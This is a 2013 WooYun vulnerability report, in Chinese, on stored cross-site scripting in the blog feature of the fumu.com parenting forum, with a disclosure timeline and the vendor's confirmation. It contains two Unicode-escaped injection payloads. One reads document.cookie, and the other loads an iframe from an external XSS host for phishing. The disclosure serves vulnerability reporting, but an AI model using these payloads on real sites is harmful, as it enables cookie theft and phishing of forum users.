当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2013-045023
漏洞标题:
父母网存储系统XSS,弹窗、钓鱼、URL跳转等
相关厂商:
父母网
漏洞作者:
Huc-Unis
提交时间:
2013-12-09 11:56
修复时间:
2014-01-23 11:57
公开时间:
2014-01-23 11:57
漏洞类型:
xss跨站脚本攻击
危害等级:
自评Rank:
6
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2013-12-09: 细节已通知厂商并且等待厂商处理中
2013-12-09: 厂商已经确认,细节仅向厂商公开
2013-12-19: 细节向核心白帽子及相关领域专家公开
2013-12-29: 细节向普通白帽子公开
2014-01-08: 细节向实习白帽子公开
2014-01-23: 细节向公众公开

简要描述:

详细说明:

在bbs.fumu.com的个人空间日志中,发布新日志,日志在所有人个人中心都会展示~ 然后添加flash。输入flash地址为:(注意是一个斜杆哦)

http://wooyun.org\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0063\u006f\u006f\u006b\u0069\u0065\u0029\u003e/1.swf


则可以弹窗,谷歌浏览器下并且跳转到嵌入的网址"wooyun.org"这个网站!

01.jpg


漏洞证明:

钓鱼也可以骗骗那些人:
xss code:

http://about:blank\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u0073\u0072\u0063\u003d\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0078\u0073\u0073\u002e\u0074\u0077\u002f\u0034\u0038\u0031\u0031\u003e/1.swf


02.jpg


修复方案:

XSS可以做很多事,钓鱼可以钓论坛的号~

版权声明:转载请注明来源 Huc-Unis@乌云

>

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-12-09 15:24

厂商回复:

已确认,正在安排修复

最新状态:

暂无